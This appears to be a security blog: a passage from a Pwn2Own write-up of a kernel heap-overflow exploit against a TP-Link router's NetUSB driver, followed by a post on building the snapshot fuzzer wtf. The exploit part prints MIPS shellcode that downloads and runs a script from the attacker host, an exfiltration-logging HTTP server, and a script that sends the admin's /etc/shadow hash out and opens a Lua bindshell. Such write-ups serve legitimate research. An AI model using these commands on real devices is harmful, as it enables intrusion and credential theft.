        if (!AllocatedBuffer) {
            return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
        }
        // ...
        if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))


Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I took a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close to my buffer. To this day, I haven't fully debugged where exactly it came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d

# ...

def main(stdscr):
    # ...
    _3mb = 3 * 1_024 * 1_024
    leaker.wait_for_one()
    y += 1


My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
    spinlock_t        lock;
    struct list_head  head;
};

struct wait_queue_entry {
    unsigned int      flags;
    void              *private;
    wait_queue_func_t func;
    struct list_head  entry;
};


This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
                             int nr_exclusive, int wake_flags, void *key)
{
    wait_queue_t *curr, *next;

    list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
        unsigned flags = curr->flags;

        if (curr->func(curr, mode, wake_flags, key) &&
                (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
            break;
    }
}
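
Since the wake-up code walks the list through the embedded list node and recovers the entry with container_of, the pointer written over `next` has to point at the list node inside the fake entry, not at its first byte. The sketch below packs such an entry; it assumes a 32-bit big-endian target with 4-byte fields and no padding, and `fake_wait_entry`, `list_pointer_for` and the addresses are hypothetical illustrations rather than the layout used by the actual exploit.

```python
import struct

# flags, private, func, then the embedded list node (next, prev).
ENTRY_FORMAT = '>IIIII'
LIST_NODE_OFFSET = 12   # three 4-byte fields precede the list node

def fake_wait_entry(func, next_ptr, prev_ptr, flags=0, private=0):
    """Serialize a fake wait queue entry whose func pointer is controlled."""
    return struct.pack(ENTRY_FORMAT, flags, private, func, next_ptr, prev_ptr)

def list_pointer_for(entry_address):
    """Value to store in the corrupted list head so the walk lands on the entry."""
    return entry_address + LIST_NODE_OFFSET

payload_address = 0x83c00000   # where the payload is staged, per the text above
entry_address = 0x8522a000     # made-up address of the fake entry
entry = fake_wait_entry(func=payload_address,
                        next_ptr=list_pointer_for(entry_address),
                        prev_ptr=list_pointer_for(entry_address))
```

Pointing `next` and `prev` back at the entry itself is just one arbitrary choice for the illustration; what matters is that `func` sits 8 bytes into the entry and that the list pointer is biased by 12.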


This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00
(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff
(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)
Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1) at kernel/sched/core.c:3375
3375 kernel/sched/core.c: No such file or directory.
(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34


Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
.word arg1
.word arg2
envp: .word 0
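
On the attacker machine, any HTTP server listening on port 8000 will do. As a minimal sketch, the handler below serves files from the current directory and prints the query string of every request, which is handy when a request is used to carry data back. The `LoggingHandler`, `split_request` and `serve` names are hypothetical and this is not the server used by the exploit.

```python
import http.server
from urllib.parse import urlsplit

def split_request(path):
    """Split a raw request target into (resource, query string)."""
    parts = urlsplit(path)
    return parts.path, parts.query

class LoggingHandler(http.server.SimpleHTTPRequestHandler):
    """Serve files from the current directory and log any query string."""

    def do_GET(self):
        resource, query = split_request(self.path)
        if query:
            print(f'[+] {self.client_address[0]} sent {query!r} to {resource}')
        super().do_GET()

def serve(port=8000):
    """Block forever, serving the current directory on every interface."""
    server = http.server.ThreadingHTTPServer(('0.0.0.0', port), LoggingHandler)
    server.serve_forever()
```

Calling `serve()` from the directory that contains the script to deliver is enough; requests for files that do not exist simply get a 404 after their query string has been logged.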


The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times out of 5 I would say. Good enough.

I started to port over the exploit to the real device and to my surprise it worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI staff would throw our exploits on the environment they had set up.

At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed.
Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the files from the firmware image with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨.

When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

• Attacking the kernel might be cool, but it is an absolute pain to debug / set up an environment. I probably would not go that route again if I was doing it again.
• Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
• Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
• The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
• I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port.
I wasn't in it for the money but maybe it would be good for me to do a better job at looking at more than one target instead of directly diving deep into one exclusively.
• The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
• Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊!

Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hang out on Diary of reverse-engineering's Discord server with us!

Building a new snapshot fuzzer & fuzzing IDA

15 July 2021 at 15:00

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows, maybe it'll be the year where I get good at computers, I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like the Windows Hypervisor Platform APIs and the KVM APIs, but also to try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code in some kind of environment like a VM or an emulator. 
It would allow the user to instrument the target the way they wanted via breakpoints and would provide the basic features that you expect from a modern fuzzer: code coverage, crash detection, generic mutators, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

1. It is a complex Windows user-mode application,
2. It parses a bunch of binary files,
3. The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than a traditional approach,
4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz (wtf), its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel crash dump and extracts the CPU state.
2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, reading and writing registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
4. 
wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel crash dumps, which is essential for wtf. So I wrote kdmp-parser, a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available off the shelf.

Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a WinDbg JavaScript extension to do the work and so I reused it: bdump.js.

Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes, he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run Intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs's devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

1. No need to load an entire dump of memory inside the emulator when it starts,
2. Only used memory gets mapped, making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
2. 
GVA: Guest virtual address. This is guest virtual memory.
3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {
    //
    // Copy the dump page into the new page.
    //
    memcpy(Page, DmpPage, Page::Size);
  } else {
    //
    // Fake it 'till you make it.
    //
    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //
  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
2. we populate its content using the crash dump,
3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. 
This is a shortened version of LoadState: void BochscpuBackend_t::LoadState(const CpuState_t &State) { bochscpu_cpu_state_t Bochs; memset(&Bochs, 0, sizeof(Bochs)); Seed_ = State.Seed; Bochs.bochscpu_seed = State.Seed; Bochs.rax = State.Rax; Bochs.rbx = State.Rbx; //... Bochs.rflags = State.Rflags; Bochs.tsc = State.Tsc; Bochs.apic_base = State.ApicBase; Bochs.sysenter_cs = State.SysenterCs; Bochs.sysenter_esp = State.SysenterEsp; Bochs.sysenter_eip = State.SysenterEip; Bochs.pat = State.Pat; Bochs.efer = uint32_t(State.Efer.Flags); Bochs.star = State.Star; Bochs.lstar = State.Lstar; Bochs.cstar = State.Cstar; Bochs.sfmask = State.Sfmask; Bochs.kernel_gs_base = State.KernelGsBase; Bochs.tsc_aux = State.TscAux; Bochs.fpcw = State.Fpcw; Bochs.fpsw = State.Fpsw; Bochs.fptw = State.Fptw; Bochs.cr0 = uint32_t(State.Cr0.Flags); Bochs.cr2 = State.Cr2; Bochs.cr3 = State.Cr3; Bochs.cr4 = uint32_t(State.Cr4.Flags); Bochs.cr8 = State.Cr8; Bochs.xcr0 = State.Xcr0; Bochs.dr0 = State.Dr0; Bochs.dr1 = State.Dr1; Bochs.dr2 = State.Dr2; Bochs.dr3 = State.Dr3; Bochs.dr6 = State.Dr6; Bochs.dr7 = State.Dr7; Bochs.mxcsr = State.Mxcsr; Bochs.mxcsr_mask = State.MxcsrMask; Bochs.fpop = State.Fpop; #define SEG(_Bochs_, _Whv_) \ { \ Bochs._Bochs_.attr = State._Whv_.Attr; \ Bochs._Bochs_.base = State._Whv_.Base; \ Bochs._Bochs_.limit = State._Whv_.Limit; \ Bochs._Bochs_.present = State._Whv_.Present; \ Bochs._Bochs_.selector = State._Whv_.Selector; \ } SEG(es, Es); SEG(cs, Cs); SEG(ss, Ss); SEG(ds, Ds); SEG(fs, Fs); SEG(gs, Gs); SEG(tr, Tr); SEG(ldtr, Ldtr); #undef SEG #define GLOBALSEG(_Bochs_, _Whv_) \ { \ Bochs._Bochs_.base = State._Whv_.Base; \ Bochs._Bochs_.limit = State._Whv_.Limit; \ } GLOBALSEG(gdtr, Gdtr); GLOBALSEG(idtr, Idtr); // ... bochscpu_cpu_set_state(Cpu_, &Bochs); }  In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this: // // Prepare the hooks. 
//
Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(/*void *Context, */ uint32_t, void *) {
  //
  // Grab the rip register off the cpu.
  //
  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //
  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//
bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, which is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs.
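Finding those backing GPAs boils down to a page-table walk. Here is a minimal sketch of one, assuming standard x86-64 4-level paging; it is not wtf's actual code. The names VirtTranslateSketch, ReadPhys64_t and ToyPhysMem_t are made up for illustration, and the walk ignores everything a real MMU also checks (permissions, reserved bits, 5-level paging):

```cpp
#include <cassert>
#include <cstdint>
#include <functional>
#include <optional>
#include <unordered_map>

// Hypothetical callback: reads 8 bytes of guest physical memory at a GPA.
using ReadPhys64_t = std::function<uint64_t(uint64_t)>;

// Hypothetical toy physical memory: maps a GPA to the qword stored there.
// Anything that was never written reads back as zero (i.e. "not present").
struct ToyPhysMem_t {
  std::unordered_map<uint64_t, uint64_t> Qwords;
  uint64_t Read(uint64_t Gpa) const {
    const auto It = Qwords.find(Gpa);
    return It == Qwords.end() ? 0 : It->second;
  }
};

// Walk the 4-level page tables rooted at Cr3 and return the GPA backing Gva,
// or std::nullopt if an entry on the way is not present.
std::optional<uint64_t> VirtTranslateSketch(uint64_t Cr3, uint64_t Gva,
                                            const ReadPhys64_t &Read) {
  assert(Read);
  constexpr uint64_t Present = 1ULL << 0;
  constexpr uint64_t LargePage = 1ULL << 7;
  constexpr uint64_t FrameMask = 0x000ffffffffff000ULL;

  uint64_t Table = Cr3 & FrameMask;
  // Level 3 = PML4, 2 = PDPT, 1 = PD, 0 = PT.
  for (int Level = 3; Level >= 0; Level--) {
    const int Shift = 12 + 9 * Level;
    const uint64_t Index = (Gva >> Shift) & 0x1ff;
    const uint64_t Entry = Read(Table + Index * sizeof(uint64_t));
    if ((Entry & Present) == 0) {
      // No valid translation: on a real system this access would page fault.
      return std::nullopt;
    }
    if ((Level == 2 || Level == 1) && (Entry & LargePage) != 0) {
      // 1 GiB (PDPT) or 2 MiB (PD) page: the walk stops early.
      const uint64_t OffsetMask = (1ULL << Shift) - 1;
      return (Entry & FrameMask & ~OffsetMask) | (Gva & OffsetMask);
    }
    Table = Entry & FrameMask;
  }
  // Table now holds the 4 KiB page frame; add the offset within the page.
  return Table | (Gva & 0xfff);
}
```

A write that spans two virtual pages has to run this translation once per page, because the two GPAs it gets back are unrelated.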
This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. As another example, the user might need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(/*void *Context, */ uint32_t, void *) {
  //
  // Grab the rip register off the cpu.
  //
  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //
  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loops

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t, void *) {
  //
  // Keep track of the instructions executed.
  //
  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //
  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {
    //
    // If we're over the limit, we stop the cpu.
    //
    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points.
Every time an instruction is executed we add the address into a set: void BochscpuBackend_t::BeforeExecutionHook( /*void *Context, */ uint32_t, void *) { // // Grab the rip register off the cpu. // const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_)); // // Keep track of new code coverage or log into the trace file. // const auto &Res = AggregatedCodeCoverage_.emplace(Rip); if (Res.second) { LastNewCoverage_.emplace(Rip); }  Tracking dirty memory wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to. void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t, uint64_t VirtualAddress, uint64_t PhysicalAddress, uintptr_t Len, uint32_t, uint32_t MemAccess) { // ... // // If this is not a write access, we don't care to go further. // if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE && MemAccess != BOCHSCPU_HOOK_MEM_RW) { return; } // // Adding the physical address the set of dirty GPAs. // We don't use DirtyVirtualMemoryRange here as we need to // do a GVA->GPA translation which is a bit costly. // DirtyGpa(Gpa_t(PhysicalAddress)); }  Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy: bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) { // ... // // Restore physical memory. // uint8_t ZeroPage[Page::Size]; memset(ZeroPage, 0, sizeof(ZeroPage)); for (const auto DirtyGpa : DirtyGpas_) { const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64()); // // As we allocate physical memory pages full of zeros when // the guest tries to access a GPA that isn't present in the dump, // we need to be able to restore those. It's easy, if the Hva is nullptr, // we point it to a zero page. 
// if (Hva == nullptr) { Hva = ZeroPage; } bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size); } // // Empty the set. // DirtyGpas_.clear(); // ... return true; }  Generic mutators I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's. class LibfuzzerMutator_t { using CustomMutatorFunc_t = decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator); fuzzer::Random Rand_; fuzzer::MutationDispatcher Mut_; std::unique_ptr<fuzzer::Unit> CrossOverWith_; public: explicit LibfuzzerMutator_t(std::mt19937_64 &Rng); size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize); void RegisterCustomMutator(const CustomMutatorFunc_t F); void SetCrossOverWith(const Testcase_t &Testcase); }; class HonggfuzzMutator_t { honggfuzz::dynfile_t DynFile_; honggfuzz::honggfuzz_t Global_; std::mt19937_64 &Rng_; honggfuzz::run_t Run_; public: explicit HonggfuzzMutator_t(std::mt19937_64 &Rng); size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize); void SetCrossOverWith(const Testcase_t &Testcase); };  Corpus store Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory. The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.  // // If the coverage size has changed, it means that this testcase // provided new coverage indeed. 
// const bool NewCoverage = Coverage_.size() > SizeBefore; if (NewCoverage) { // // Allocate a test that will get moved into the corpus and maybe // saved on disk. // Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(), ReceivedTestcase.size()); // // Before moving the buffer into the corpus, set up cross over with // it. // Mutator_->SetCrossOverWith(Testcase); // // Ready to move the buffer into the corpus now. // Corpus_.SaveTestcase(Result, std::move(Testcase)); } } // [...] // // If we get here, it means that we are ready to mutate. // First thing we do is to grab a seed. // const Testcase_t *Testcase = Corpus_.PickTestcase(); if (!Testcase) { fmt::print("The corpus is empty, exiting\n"); std::abort(); } // // If the testcase is too big, abort as this should not happen. // if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) { fmt::print( "The testcase buffer len is bigger than the testcase buffer max " "size.\n"); std::abort(); } // // Copy the input in a buffer we're going to mutate. // memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(), Testcase->BufferSize_); // // Mutate in the scratch buffer. // const size_t TestcaseBufferSize = Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_, Opts_.TestcaseBufferMaxSize); // // Copy the testcase in its own buffer before sending it to the // consumer. // TestcaseContent.resize(TestcaseBufferSize); memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);  Detecting context switches Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed: void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t, uint32_t What, uint64_t NewCrValue) { // // We only care about CR3 changes. 
  //
  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //
  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //
  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. 
To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces can also be loaded into lighthouse to analyze the coverage generated by a particular test case.

Crash detection

